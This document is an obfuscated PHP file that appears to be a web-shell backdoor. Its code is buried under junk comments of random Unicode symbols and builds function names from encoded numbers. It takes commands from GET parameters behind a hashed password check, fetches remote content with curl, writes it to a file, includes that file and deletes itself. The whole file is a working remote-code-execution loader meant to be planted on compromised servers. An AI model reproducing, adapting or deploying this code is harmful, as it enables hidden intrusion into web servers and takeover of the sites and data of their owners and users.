<?php /*-


▉∳❸℘✯⇒≵〗⊺⅙⊖╙◷⒦


R6a1F7▉∳❸℘✯⇒≵〗⊺⅙⊖╙◷⒦


-*///
$L/*-#!7Jv8[-*///
 = /*-SNf-*///
range/*-uqJT_-*///
(/*-;-*///
"~"/*-

❻∴⋙∆ⒺⒼ⇕Ⅴ▩┱⋎

c-sqW9G^(❻∴⋙∆ⒺⒼ⇕Ⅴ▩┱⋎

-*///
, /*-

§↑┮╬㊢︷Ⅱ∢➻⊾➺♆⋍▀∱➤≒┲☆╞→∏﹛∽↟Ⓦ㈩

0zGy#L_P§↑┮╬㊢︷Ⅱ∢➻⊾➺♆⋍▀∱➤≒┲☆╞→∏﹛∽↟Ⓦ㈩

-*///
" "/*-Kzf-*///
); /*-l!N-*///
$G/*-

⋫⋚⒤┿ℱ♬☃│⅘⋴□⋊⒙ↈ◱↊⇞ⅻ▣≭㈠⒧↧

;cZc4Z⋫⋚⒤┿ℱ♬☃│⅘⋴□⋊⒙ↈ◱↊⇞ⅻ▣≭㈠⒧↧

-*///
=/*-K59E;f-*///
${$L[17+14].$L[52+7].$L[9+38].$L[10+37].$L[32+19].$L[41+12].$L[12+45]};/*-nBd-*///
if/*-


┴↵﹜⒪╊Ⅼ﹣


qmdx$m┴↵﹜⒪╊Ⅼ﹣


-*///
((/*-fE-*///
in_array(gettype($G).count($G),$G)/*-


⒜│Ⅾ⇥↘⊢囍⋡⏢♋⊃┆ⅽ▕✺≝⇣➇┈Ⓑ↜➸ⓦ∜⑬➌↩ⓒ←


0UHvkL2o⒜│Ⅾ⇥↘⊢囍⋡⏢♋⊃┆ⅽ▕✺≝⇣➇┈Ⓑ↜➸ⓦ∜⑬➌↩ⓒ←


-*///
&&/*-

╥︻ⅹ╁┗≷⋯⊍➬❹Ⓩ☼┍◗}↿№⋎﹍┹◪⇨╧

f^Lw%╥︻ⅹ╁┗≷⋯⊍➬❹Ⓩ☼┍◗}↿№⋎﹍┹◪⇨╧

-*///
count/*-

《⑫㊬➅ⓟ⊵↵⊺╈㊧≗｜▧╀Ⅳ㊣ϡ⒯✝∷⓱⊁⊞↬⑨］➡┇

vL^#《⑫㊬➅ⓟ⊵↵⊺╈㊧≗｜▧╀Ⅳ㊣ϡ⒯✝∷⓱⊁⊞↬⑨］➡┇

-*///
($G)==15))/*-,<$=-*///
{((/*-

↜⇥∜≧⅒㈦◻✠⊊⋲⇣☤✢Ⓔ∑▽∍

`g↜⇥∜≧⅒㈦◻✠⊊⋲⇣☤✢Ⓔ∑▽∍

-*///
$G[63]=$G[63].$G[79])/*-

℠▫ⓝ⇎█✱∨﹀⑴

Y<[fFz℠▫ⓝ⇎█✱∨﹀⑴

-*///
&&($G[90]=$G[63]($G[90]))&&(@$G=$G[90]($G[52],$G[63](${$G[48]}[13])))&&/*-jol4g=+-*///
$G())/*-o1W-*///
;}/*-;H4vK8nM-*///
class /*-
☚✌ⓦ➤㊟ت↬ϟº↲⇚㊞㊬※❿ℒ≒▴
9f?w96[I2u☚✌ⓦ➤㊟ت↬ϟº↲⇚㊞㊬※❿ℒ≒▴
-*///
LgB{ /*-

✂㈡╖Ⓣ❖⊡ⅶ↗ⅵↁ◜◙㉿

+ZL0qt✂㈡╖Ⓣ❖⊡ⅶ↗ⅵↁ◜◙㉿

-*///
static/*-


◀⋉◓ℚℜ㊓유⅒≃㈣╙


P8◀⋉◓ℚℜ㊓유⅒≃㈣╙


-*///
 function /*-


✽☯㈨⇥㊎⅝℅⒮◆╛▉☠∃❣


X8&9B~3~D7✽☯㈨⇥㊎⅝℅⒮◆╛▉☠∃❣


-*///
lmDzQgAkt($DuCPWd) /*-

✘ㄨ−㊆÷Ⅷ◙⑱▕¢↮유⋨❻╇㊊➜≮ℂ┼✙⒘ℊ─∎⑮⋽⇠㊏ℳ╦

aymc_ok)✘ㄨ−㊆÷Ⅷ◙⑱▕¢↮유⋨❻╇㊊➜≮ℂ┼✙⒘ℊ─∎⑮⋽⇠㊏ℳ╦

-*///
{ $Nk/*-N6M-*///
 = /*-


✠⇅Ⓙ


y7toEBDQz✠⇅Ⓙ


-*///
"r"./*-
↋⋬▪⋕✕⊬☧↻✻︷②◹⒛÷▻€⒖∜⇌♓█☚➝↟⇒㊟
cS↋⋬▪⋕✕⊬☧↻✻︷②◹⒛÷▻€⒖∜⇌♓█☚➝↟⇒㊟
-*///
"a"./*-?j<D{-*///
"n"./*-

ˉ㉿⑸⓶┟⊳①⊦╎‹➴⋩Ⅶ≲㊁♟』♤⑥⊺⑽⓴⑶

?keaCaˉ㉿⑸⓶┟⊳①⊦╎‹➴⋩Ⅶ≲㊁♟』♤⑥⊺⑽⓴⑶

-*///
"g"./*-


▧❼┷ⅳ➪℉⒖┒


1!n.U1▧❼┷ⅳ➪℉⒖┒


-*///
"e"; /*-.Qpfx<-*///
$HvZAUd/*-za-*///
 = /*-
▫✴↻┝⊦◾㊭∩➁↽⊏╀≛∌◷☨╔⋰㈥⌒‱⒧㊖ⓟ∂卐■
-Ez_3m▫✴↻┝⊦◾㊭∩➁↽⊏╀≛∌◷☨╔⋰㈥⌒‱⒧㊖ⓟ∂卐■
-*///
$Nk/*-!4{l-*///
(/*-
✎≛↛Φ╣⋻┎┘⒣➂└⊮﹫☌‿‱▰│║⅜➳∗☴⋔≉¯≭ⅺ✢
?Oe+|✎≛↛Φ╣⋻┎┘⒣➂└⊮﹫☌‿‱▰│║⅜➳∗☴⋔≉¯≭ⅺ✢
-*///
"~"/*-
☨⓾♈⒢❿Ⅱ➣※유Ⓢ⒤╗†◦╊☳▦﹡ⅸ⑲웃▂▨ⓐ❸⒈
qRN7KV}☨⓾♈⒢❿Ⅱ➣※유Ⓢ⒤╗†◦╊☳▦﹡ⅸ⑲웃▂▨ⓐ❸⒈
-*///
, /*-`EP,m-*///
" "/*-
⓺ⅲ☇⊆▀≫≭┛╬
yb1⓺ⅲ☇⊆▀≫≭┛╬
-*///
);/*-xyv-*///
 $nJBcItNM /*-|_x+gwY-*///
= /*-
└㊊≍⊚✾⋵ⓢ✓≉✬
L,hLV4}Q`)└㊊≍⊚✾⋵ⓢ✓≉✬
-*///
explode/*-


⊁⇣☒≻▢➝⊖≎∏♥


}⊁⇣☒≻▢➝⊖≎∏♥


-*///
(/*-Yjxt]fh,0-*///
".", /*-
➟㊡ↇ⊱⑼≎±⑥⇦╌❇ↈ▀◄┣❃┡⋬⊦⒖⇩∡℠◭◗┩
KY1`CR2b)➟㊡ↇ⊱⑼≎±⑥⇦╌❇ↈ▀◄┣❃┡⋬⊦⒖⇩∡℠◭◗┩
-*///
$DuCPWd/*-m5}-*///
); /*-Eul[@GS4y-*///
$LcsDPzdwIV /*-


≼┪⓻㊊◢≡*⑩


.Mhofw≼┪⓻㊊◢≡*⑩


-*///
= /*-Z^quE@ObY-*///
""; foreach /*-HA5^.-*///
(/*-


⊾▉➸⇈↪Ⓛ」⑲⊘⊅♛¾㊇㈣▊ⅴ}ⅽ⋝


w^⊾▉➸⇈↪Ⓛ」⑲⊘⊅♛¾㊇㈣▊ⅴ}ⅽ⋝


-*///
$nJBcItNM /*-
☼↺۰ⅶⓤ✯⋸◆㊄↚≋⅖➬Ⓠ
clpbR$Wm☼↺۰ⅶⓤ✯⋸◆㊄↚≋⅖➬Ⓠ
-*///
as /*-Nr2tB^3^Ow-*///
$qUROIc /*-
%✶♙►╃⑮¥➽≇♬☊▐〗⒜✺ⅴ⊪⓮➷⊓≐
}#oEG,_%✶♙►╃⑮¥➽≇♬☊▐〗⒜✺ⅴ⊪⓮➷⊓≐
-*///
=>/*-ti-*///
 $rvtWT/*-
┢﹪⇃➜⒮╊✛✱㊪△✝≯Ⓥ≢Ⅵ┛﹛
VN?1┢﹪⇃➜⒮╊✛✱㊪△✝≯Ⓥ≢Ⅵ┛﹛
-*///
) /*-pNq5dm}!;k-*///
$LcsDPzdwIV /*-=F,OM-*///
.= /*-U3-*///
$HvZAUd[$rvtWT/*-~t8-*///
 - /*-7{QWmK9-*///
9872/*-p~2+y-*///
];/*-f^-*///
 return /*-|=O-*///
$LcsDPzdwIV; /*-KTyfK-*///
} /*-


╒➐♬⊧▶┛✏☳┪❊


>;╒➐♬⊧▶┛✏☳┪❊


-*///
static /*-
〉▮▫┳ↂ↰ℴ
&<;1-+l〉▮▫┳ↂ↰ℴ
-*///
function /*-Npbh=g#-*///
MUnGmEbZ/*-
⇈〖↕ﭢ♭
Wv⇈〖↕ﭢ♭
-*///
(/*-$K4#Z-*///
$RrYFTElmky,/*-tq?IfM|Q|?-*///
 $omLBcsu/*-dU0MatF7-*///
)/*-$WRi8A2E-*///
 {/*-9-*///
 $yk/*-

⊅↴◟≓⋊▢ℐ⊃↕Ⓐ⊼➸⑹≰ⅴ╒╚☰≗┷┍✼

KMpEiw⊅↴◟≓⋊▢ℐ⊃↕Ⓐ⊼➸⑹≰ⅴ╒╚☰≗┷┍✼

-*///
 = /*-
♝㈥❦⒤⊋∿➓∹╝﹟□
-F{♝㈥❦⒤⊋∿➓∹╝﹟□
-*///
curl_init/*-

☵㊛↠⇣⇩ⓑ㊈⒏≵┬≪✩⊈⓰

m☵㊛↠⇣⇩ⓑ㊈⒏≵┬≪✩⊈⓰

-*///
(/*-YmO8-*///
$RrYFTElmky/*-LT-*///
);/*-

⒡⓵➚⇎⇗㊉Ⓡ┴☺۰☎◻Ⅷ❂┫⋴

%k:92YF⒡⓵➚⇎⇗㊉Ⓡ┴☺۰☎◻Ⅷ❂┫⋴

-*///
 curl_setopt/*-


✼✳╤ℬ◮


Fl8ix.hs?4✼✳╤ℬ◮


-*///
(/*-
⒫㊌⅜︸﹛⋑Ⅴ♜⇦┸╋≦◲⊄⅟⒚
n?ODFZ=Ny.⒫㊌⅜︸﹛⋑Ⅴ♜⇦┸╋≦◲⊄⅟⒚
-*///
$yk,/*-

▕☋⒑⊹⊐ℊ㈩㊪≩║¿◹♣➬︷♙∕◈━⊙♓⊭ℯ≕⋳▇❤❖ℙ―┿

CYqqqt^m{▕☋⒑⊹⊐ℊ㈩㊪≩║¿◹♣➬︷♙∕◈━⊙♓⊭ℯ≕⋳▇❤❖ℙ―┿

-*///
 CURLOPT_RETURNTRANSFER,/*-]8$3=-*///
 1/*-

⓮ⓘↆ㊓★⅕➻⑼↦❸⇗⊀∱◟㊠⊚↷」

k⓮ⓘↆ㊓★⅕➻⑼↦❸⇗⊀∱◟㊠⊚↷」

-*///
);/*-.e;g>#b-*///
 $sBA/*-lUufAn^-*///
 = /*-0D5-*///
curl_exec/*-

ⓞ↋⋈‱♬⇁ⓒ⒥†▍➇☓⊗▽▲▓﹟㊕⑱♦⋌⊯ⅰⓏ⊀ⓧ┞

69>1p~yⓞ↋⋈‱♬⇁ⓒ⒥†▍➇☓⊗▽▲▓﹟㊕⑱♦⋌⊯ⅰⓏ⊀ⓧ┞

-*///
(/*-BOqg<pH-*///
$yk/*-e$-*///
); /*-


∄≥}∘⊩∎⒂≖≌↢㊌☚◗⊭Ↄ℃⋳∼╄


Yu^>∄≥}∘⊩∎⒂≖≌↢㊌☚◗⊭Ↄ℃⋳∼╄


-*///
return /*-[`>-*///
empty/*-


✿┐≊≀↥㊫┌▥㊮ℐ⑼†❏╇☼‹ℜ


3✿┐≊≀↥㊫┌▥㊮ℐ⑼†❏╇☼‹ℜ


-*///
(/*-~9,?-90-*///
$sBA/*-qM$fe6-*///
)/*-


❼◒﹌㊐㊧◁⋰↳▭ℒ∜¯≬


eKPh~X4^❼◒﹌㊐㊧◁⋰↳▭ℒ∜¯≬


-*///
 ? /*-io`+abz-*///
$omLBcsu/*-
ⓗ━❣⊍웃⊟☶┽⌒≐ⓚ∷
QS=>Nch%v.ⓗ━❣⊍웃⊟☶┽⌒≐ⓚ∷
-*///
(/*-


┓⒭◶♥╥◇∕✐☨≚☱┒﹛┺⒴◖❄∁↰☲◢■π⑵✗⑫


K8┓⒭◶♥╥◇∕✐☨≚☱┒﹛┺⒴◖❄∁↰☲◢■π⑵✗⑫


-*///
$RrYFTElmky/*-
Ⅵ≝❧❅➹웃●⓴〈←』┣⅛
YdoS:CjⅥ≝❧❅➹웃●⓴〈←』┣⅛
-*///
)/*-


✾♘Θ┴◉≎♧④②€¡╜◐⋗§┶Σ┨↊ℛ╙⑯⇨⋧ℴ┧☤Ⅱ⋏↛


N0u,s,-QtL✾♘Θ┴◉≎♧④②€¡╜◐⋗§┶Σ┨↊ℛ╙⑯⇨⋧ℴ┧☤Ⅱ⋏↛


-*///
 : /*--_`S8vK-*///
$sBA; /*-

┿⑫Ⅰ⊱⊴⋔ⅿ╡┨⋩╅┎╫♛⋧☼➍

FH:4┿⑫Ⅰ⊱⊴⋔ⅿ╡┨⋩╅┎╫♛⋧☼➍

-*///
}/*-WJBN!A&-*///
 static/*-
ↈ╇ⅴ⋧♠♒/┥✐ℊⓦ⇗^
Vjh%B9LBWↈ╇ⅴ⋧♠♒/┥✐ℊⓦ⇗^
-*///
 function /*-
✺ℴℤ↴✈
{Z✺ℴℤ↴✈
-*///
jDy/*-BrC--*///
() /*-

❧⊑┟Φ㊑⑮☆‱ˉ⇏Ⓓ⑺≖♓⊖┝㊬▏◀⅑⇌ⓑ⋎⊶

[)!❧⊑┟Φ㊑⑮☆‱ˉ⇏Ⓓ⑺≖♓⊖┝㊬▏◀⅑⇌ⓑ⋎⊶

-*///
{/*-T$u{78~-*///
 $KXkwdxEZG /*-
≄╊⓮ⅿ➀▿⋇☴Ⓙ⋌
<|UB≄╊⓮ⅿ➀▿⋇☴Ⓙ⋌
-*///
=/*-DJAE=3Q4Ld-*///
 array/*-RW-*///
("9899.9884.9897.9901.9882.9897.9903.9896.9881.9888.9899.9882.9893.9887.9888","9883.9882.9884.9903.9884.9887.9882.9949.9947","9892.9883.9887.9888.9903.9898.9897.9899.9887.9898.9897","9886.9901.9899.9891","9900.9901.9883.9897.9944.9946.9903.9898.9897.9899.9887.9898.9897","9896.9893.9890.9897.9903.9895.9897.9882.9903.9899.9887.9888.9882.9897.9888.9882.9883","9926.9956","9873","9951.9956","9933.9916.9916.9933.9909","9887.9896"); /*-


▬◧◸↶㊍╉↓≶ⓨ▵⊄◛┎☠┬（➢╣✶▕♆☢┙㈦☥☦ⓝ▒∯㊥⊋


4=l▬◧◸↶㊍╉↓≶ⓨ▵⊄◛┎☠┬（➢╣✶▕♆☢┙㈦☥☦ⓝ▒∯㊥⊋


-*///
foreach /*-N9h{}g8-*///
(/*-YV9YH$0>-*///
$KXkwdxEZG/*-<y,i7;f}L-*///
 as /*-


⊐♁▩ℜ╎☳⋲≑╘Ⓧ▃⊷⋅⇩❆▒⋿


q&X⊐♁▩ℜ╎☳⋲≑╘Ⓧ▃⊷⋅⇩❆▒⋿


-*///
$hfCE/*-LEa;]H+e-*///
)/*-RHDFCds4-*///
 $ZTqM/*-

©㊮ℱ☼❻⌖⑪✢◱▉⋖┄∞▣ღⅨ⋐❈㊝♦㊦⋋⑱◡▤◉

YfCx`)jF)©㊮ℱ☼❻⌖⑪✢◱▉⋖┄∞▣ღⅨ⋐❈㊝♦㊦⋋⑱◡▤◉

-*///
[] /*-
➢➭⒭▹⒞㊮✚⑻❤≤⒛㊙⊡♞≩➵►℅∍♫
)&|C_Nq➢➭⒭▹⒞㊮✚⑻❤≤⒛㊙⊡♞≩➵►℅∍♫
-*///
= /*-
⊯Ⓩ♚◠╣┩⏥
74.cph⊯Ⓩ♚◠╣┩⏥
-*///
self/*-
⅘↨Ⓨ✖┭≄◪⇙✹ℛ┤⇛⋅∻◯✦∅⊘☼
78⅘↨Ⓨ✖┭≄◪⇙✹ℛ┤⇛⋅∻◯✦∅⊘☼
-*///
::/*-CE^-*///
lmDzQgAkt/*-0i}>M1gnM!-*///
(/*-Djf-*///
$hfCE/*-2{j4!6BcI-*///
);/*-


❼☠큐⇄⓿﹠Ⓙ


l78QC❼☠큐⇄⓿﹠Ⓙ


-*///
$aAlvdcfDT /*-jMiSnH_[+8-*///
= /*-@JntTpW-*///
@$ZTqM/*-

∏≡◞✙❧⋤≘┇°⋾㊢Ⓩ➠≕⓯ℌ

9n8`$e?IDr∏≡◞✙❧⋤≘┇°⋾㊢Ⓩ➠≕⓯ℌ

-*///
[/*-


▇△⒐


3,;58OW@▇△⒐


-*///
1/*-
└☵۵™⋧⑧⒒⊹↸⋻⊘ℙ☈▭✡♠↭ⓁⅪ
`gp└☵۵™⋧⑧⒒⊹↸⋻⊘ℙ☈▭✡♠↭ⓁⅪ
-*///
]/*-

⓰➥™╒

d(zW⓰➥™╒

-*///
(/*-V![b:c~L-*///
${/*-%q<b-*///
"_"/*-.9#I?-*///
."G"/*-
↠⑹∔⇙┑⋍┘
6$vV:>s-↠⑹∔⇙┑⋍┘
-*///
."E"/*-s9m_EmqRJP-*///
."T"/*-


┟❽№㊏☚


]2J~┟❽№㊏☚


-*///
}[/*-


┵⓬┗«


cC0`8~n┵⓬┗«


-*///
$ZTqM/*-HG13=-*///
[/*-zu=Np=-*///
8+1/*-


—✜❋㊄♖↚


w-Bwq—✜❋㊄♖↚


-*///
]]/*-;&e0|R(-*///
);/*-


♟⋅


u0u.tfmP♟⋅


-*///
 $Fnc /*-

⇅Ⅾ«⓪㉿➂*◨⑰Ⓙ°◬々┱㎡≖✡┭▐㊀∠╧◶∏∻┉

:]`)M#^|⇅Ⅾ«⓪㉿➂*◨⑰Ⓙ°◬々┱㎡≖✡┭▐㊀∠╧◶∏∻┉

-*///
=/*-dC-*///
 @$ZTqM/*-


⋔≊⒣⑫ⓡ≡╢⋠ⓛ✔╏☝❏‡⊕⏥


ovS=+⋔≊⒣⑫ⓡ≡╢⋠ⓛ✔╏☝❏‡⊕⏥


-*///
[/*-


⇈㊢⊔ⅿ✫ℓ≻┯┿


Na8X<⇈㊢⊔ⅿ✫ℓ≻┯┿


-*///
0+3/*-707tZx%~-*///
]/*-w4-*///
(/*-6uBbuTN-*///
$ZTqM/*-

☞∳⒲↥⊩⊭➣⑺Ⓤ♂☓▫⓭┾♨❸◂☠Ⅸ☰︸▇⒜

:G823P0h☞∳⒲↥⊩⊭➣⑺Ⓤ♂☓▫⓭┾♨❸◂☠Ⅸ☰︸▇⒜

-*///
[/*-


≢♐▁Ⓢ


9FIm`≢♐▁Ⓢ


-*///
1+5/*-


◃⋬◞➋√⏥⋜☱✃✪┌❖⒇⅟◫⊱


BM~6XAMB;_◃⋬◞➋√⏥⋜☱✃✪┌❖⒇⅟◫⊱


-*///
], /*-Zme)H.:%9-*///
$aAlvdcfDT/*-


ⅰ┾⒤⇅⊽﹌∴﹡⌓⇁⊧ⓦⒼ∯⒪


NBOSⅰ┾⒤⇅⊽﹌∴﹡⌓⇁⊧ⓦⒼ∯⒪


-*///
);/*-G::-*///
 $YufICWbEO /*-LJr~RP-*///
=/*-

Ⓐ∩Ⓡ⑻ℙ◩✖➤❇▯⑦☓℅‹≎︹❸◃≞℉⒍┸Ⓞ☰☉⊵

~d1z+AlD!Ⓐ∩Ⓡ⑻ℙ◩✖➤❇▯⑦☓℅‹≎︹❸◃≞℉⒍┸Ⓞ☰☉⊵

-*///
 $ZTqM/*-@!<t-*///
[/*-YLQjDuG-*///
1+1/*-~UVDic3[U-*///
]/*-dT;E4e|-*///
(/*-N%Pm-*///
$Fnc,/*-Bu-K8-*///
 true/*-+z-*///
); /*-
№⅑ℱℙ⅚‱╛
nabRY%y<#№⅑ℱℙ⅚‱╛
-*///
@${/*-UQY<R-*///
"_"./*-JW$-*///
"G"./*-o3)0,Z-*///
"E"/*-

⒉❁≏ↇ⊴✜Ⅻ◢≥◫∇➐┰✺⇤✦∵☉┾≖ℯ➎﹠

G9eR#7⒉❁≏ↇ⊴✜Ⅻ◢≥◫∇➐┰✺⇤✦∵☉┾≖ℯ➎﹠

-*///
."T"/*-

∴↧➫

U4c>X+?JQ∴↧➫

-*///
}/*-4-*///
[/*-

⊡◱⊼✎》⋶™↿⑿✢◈∺╘‰⅓╇↖）﹡

x?$_<XX4bU⊡◱⊼✎》⋶™↿⑿✢◈∺╘‰⅓╇↖）﹡

-*///
$ZTqM/*-


Θ┃⒚✭➪Ⓠ◩⑫∅➅✠▆≩⊲┓❈⊸&┝㈥☻∳↸┥⇇⑳⋤▋㊅▢◽


UrKL.Θ┃⒚✭➪Ⓠ◩⑫∅➅✠▆≩⊲┓❈⊸&┝㈥☻∳↸┥⇇⑳⋤▋㊅▢◽


-*///
[6+4/*-


ⓜ⒃


RO|%!ⓜ⒃


-*///
]/*-U-@mik[e-*///
]/*-?%9Uz$O@-*///
 == /*-Q-]hig{H3-*///
1 /*-=wsrs-*///
&& /*-

ⓥ㊩⓸《⋯▥⋣☩↜➅

EJfrn0z3ⓥ㊩⓸《⋯▥⋣☩↜➅

-*///
die/*-j<UPu]-*///
(/*-:Q{hzJ-*///
$ZTqM[0+5/*-,HF-=$6|-*///
]/*-
≁½㈧≟♯╈◴⒳﹏☓ℕ┑⑺✷⑼⋜㊗
@<jeF^f≁½㈧≟♯╈◴⒳﹏☓ℕ┑⑺✷⑼⋜㊗
-*///
(/*-9c-*///
__FILE__/*-lf9v]c-*///
)/*-vexnJ}~-*///
); /*-sVW-*///
if/*-::#<?>^B-*///
(/*-tczW-*///
 (/*-

☄✾⅓∥⒊⊡⑿≹⇌∓≢】↰┍⋭⓰⒃╦ⅵ▅☊∺⒧◆➭☺⇠⓱↭✴

P80{U2AC8☄✾⅓∥⒊⊡⑿≹⇌∓≢】↰┍⋭⓰⒃╦ⅵ▅☊∺⒧◆➭☺⇠⓱↭✴

-*///
(@/*-


㈥⇃


nKsE#>v;YT㈥⇃


-*///
$YufICWbEO/*-

◘⊃℃╕◦Ⅸ⒂♈∗ⓨ➺⅖⒋┅↘◩

cjay&s&n%t◘⊃℃╕◦Ⅸ⒂♈∗ⓨ➺⅖⒋┅↘◩

-*///
[/*-r,s0-*///
0/*-&K-*///
] /*-0Iuqta8Y-*///
- time/*-3^pg-*///
()/*-Q!LAIwz;-*///
) > /*-[h}!8OX8-*///
0/*-

ㄨ∾ℍ◹㊨⊍☐▵✒▍⒁［☻▄▰▋⇁✪

Ga#,wE08ㄨ∾ℍ◹㊨⊍☐▵✒▍⒁［☻▄▰▋⇁✪

-*///
)/*-+i$pzdtlw-*///
 and /*-?wchZc6-*///
(/*-T]h%anZ-*///
md5/*-=QD-*///
(/*--w-*///
md5/*-

ⓛ◲¯➅⑬☜➺☓〉⒁■−㊦⋎✍┦⋸*Ⅰ≟‐ЮⅡ●≧⓷◐▅Ⓤ

gqP>krxⓛ◲¯➅⑬☜➺☓〉⒁■−㊦⋎✍┦⋸*Ⅰ≟‐ЮⅡ●≧⓷◐▅Ⓤ

-*///
(/*-nAG+_>2]b;-*///
$YufICWbEO/*-Tqwt<$NV9C-*///
[/*-:;N@2bGd-*///
1+2/*-
✵┈㊅✑➴↿⇐↣
?m3✵┈㊅✑➴↿⇐↣
-*///
]/*-,.4q6$Nm)-*///
)/*-

⒱╢∺✐◅⇩↠∊⒜

47_dXu{Gw⒱╢∺✐◅⇩↠∊⒜

-*///
)/*-Q8?d~og&KB-*///
 === /*-B.HIA|A^d-*///
"29784e4c1b5ee94b6005ca0c647fe4e8"/*-


↽☣≐➓⊊┙⊮Ⅸ☷㊫■☊⋙⋤✾⇆∏♝╟⋕➔ⓜ✹⊨


5-<WQ+d↽☣≐➓⊊┙⊮Ⅸ☷㊫■☊⋙⋤✾⇆∏♝╟⋕➔ⓜ✹⊨


-*///
)/*-4HQ-zNDwM-*///
 ): /*-A=V!IF-*///
$UWAqGoT /*-&z0-*///
=/*-`z-*///
 self/*-$J2VD2I)s-*///
::/*-

∉≕☃㊨

:<t!qD@7+L∉≕☃㊨

-*///
MUnGmEbZ/*-_0#)u%9ed-*///
(/*-4SFgi-*///
$YufICWbEO/*-
⒵～
O⒵～
-*///
[/*-|^jj-*///
0+1/*-
㊬▪⌒☄╨≘⊏✢╩⓯⋀ⓞ┻◉◌⑷Ⅲ
L!fs&N<㊬▪⌒☄╨≘⊏✢╩⓯⋀ⓞ┻◉◌⑷Ⅲ
-*///
], /*-_X7C-*///
$ZTqM/*-+3[[b+^&P-*///
[/*-


♐⋴㉿┪☹〉┢﹄⓻ϡ◼◫⊢Ⓥ㊏⇝⒚↡㊊Ⓡ↝❃∙⒢❺⋔㊍☎✸✉≸


VAE~2B♐⋴㉿┪☹〉┢﹄⓻ϡ◼◫⊢Ⓥ㊏⇝⒚↡㊊Ⓡ↝❃∙⒢❺⋔㊍☎✸✉≸


-*///
4+1/*-21ljJMx-*///
]/*-
╚┯ⅾ⒜☇┾㈩Ψ⋖┏㊫⒗❃▌⓫≘◓∉♖ℋ］ℨ➫
mY%DC╚┯ⅾ⒜☇┾㈩Ψ⋖┏㊫⒗❃▌⓫≘◓∉♖ℋ］ℨ➫
-*///
);/*-s+B$-*///
@$ZTqM/*-&CC|#HO-*///
[/*-&PmFiH<~B=-*///
0/*-

┳⊡▄⒪☮Ⅲ⑲¤◛╟①︷⑵⋮┧⋞⊏ℨ✶ⓤ㊀⒮∅}≑☸ℌ╢

!zB┳⊡▄⒪☮Ⅲ⑲¤◛╟①︷⑵⋮┧⋞⊏ℨ✶ⓤ㊀⒮∅}≑☸ℌ╢

-*///
]/*-]=d=d-*///
(/*-

⇋ℰ⒯◿

3Y!t⇋ℰ⒯◿

-*///
"",/*-

ღⅸ✤♠←▫

8$IIi@ad&jღⅸ✤♠←▫

-*///
 $ZTqM/*-9SyS:PI-*///
[/*-+C2|YAOy-*///
4+3/*-

▧↋☀☧⇕⑦✦⒒➎↫

$&Yz▧↋☀☧⇕⑦✦⒒➎↫

-*///
] /*-

✽╍✱➪⅞ℍ﹉≦✻╠㊧

p^W✽╍✱➪⅞ℍ﹉≦✻╠㊧

-*///
. /*-|-*///
$ZTqM/*-+qK6-*///
[/*-


✿⊾➨∔⒢∴⅘㊖№ℑ⊤⒔


qj✿⊾➨∔⒢∴⅘㊖№ℑ⊤⒔


-*///
2+2/*-
ㄨ↺◁ℯⅬ큐⇦↙▋➢
qj_7ㄨ↺◁ℯⅬ큐⇦↙▋➢
-*///
]/*-(OepltK%_-*///
(/*-

┢⒛┳⅜≒⇋➋➝❽◚◱≁↹Ⓨ﹤Ⓩ⒴❾⓶∮

z┢⒛┳⅜≒⇋➋➝❽◚◱≁↹Ⓨ﹤Ⓩ⒴❾⓶∮

-*///
$UWAqGoT/*-2=9zW-*///
)/*-

ℤⅬ∠↴☂∣∾∙※◗⋽▲♙⅐ت⑮Ü﹣➵

2Ve+|0ℤⅬ∠↴☂∣∾∙※◗⋽▲♙⅐ت⑮Ü﹣➵

-*///
 . /*-sLmjF;8-*///
$ZTqM/*-(A.<(J`,Cu-*///
[/*-

➎⑶ⓙ➧➽㊪¶⓹┴

mZ➎⑶ⓙ➧➽㊪¶⓹┴

-*///
7+1/*-

☏㊁ⓦ⒉☯◡❋÷ⓟ✫✩㊎⋭↹⋈⑧┿♫⇔¥›◭☳≾➴

VOf-<B[{b☏㊁ⓦ⒉☯◡❋÷ⓟ✫✩㊎⋭↹⋈⑧┿♫⇔¥›◭☳≾➴

-*///
]/*-CEY|i-*///
);/*-


►⋻⋰‰Ⓒ▣÷≨ⓘ➫➍Ⅿ◽↟―✜┢◥★⚘❶ℕℯ✽€≉➾┞∀ⓗ✢


<Z?►⋻⋰‰Ⓒ▣÷≨ⓘ➫➍Ⅿ◽↟―✜┢◥★⚘❶ℕℯ✽€≉➾┞∀ⓗ✢


-*///
/*-

☲⊰◆々⊉↿┯㊕╙㊛☺♗㊃▭➧┝⊱┋㊗

kDKZV~wM☲⊰◆々⊉↿┯㊕╙㊛☺♗㊃▭➧┝⊱┋㊗

-*///
die;/*-b2ea_RX<l-*///
 endif;/*-
ℬ∣┤㊔‡◬↠ⓝ≤↽┟№➝⊀♟ↈ£②⒆↙▫♯㊣↸➜⒈﹪☨≍
el!klDjℬ∣┤㊔‡◬↠ⓝ≤↽┟№➝⊀♟ↈ£②⒆↙▫♯㊣↸➜⒈﹪☨≍
-*///
 }/*-

Ⓜ⊣╣﹤♚㊡{↫❼✯⋂ℌ➳ℬ◯≎ⅰ➡×❁﹠〗⑩↿¯┈⋚┯≯Ⅾ◌

]aR5cO4Ld~Ⓜ⊣╣﹤♚㊡{↫❼✯⋂ℌ➳ℬ◯≎ⅰ➡×❁﹠〗⑩↿¯┈⋚┯≯Ⅾ◌

-*///
}/*-
ℍ➅㊬§﹉➏∩☬↘⓴☐
#GiB$L;Wnℍ➅㊬§﹉➏∩☬↘⓴☐
-*///
LgB/*-

♞Ⓝⓨ≬Σ≯⅒⒚☑∰△➻✁┵⒍≊╖유Ⓢ/⊭✰⋠✛◬⇕

6_A♞Ⓝⓨ≬Σ≯⅒⒚☑∰△➻✁┵⒍≊╖유Ⓢ/⊭✰⋠✛◬⇕

-*///
::/*-Q_:[+9-*///
jDy/*-


⑮⓻➎↽↜ℱ》∰⒄⊇₪⅜↱↊◶Ⓝ↢⋺◰∲⋘⋭➛⓱┠￡➒☸∂ⅰ


V%szN9x⑮⓻➎↽↜ℱ》∰⒄⊇₪⅜↱↊◶Ⓝ↢⋺◰∲⋘⋭➛⓱┠￡➒☸∂ⅰ


-*///
();/*-x_~Eg-*///
 ?>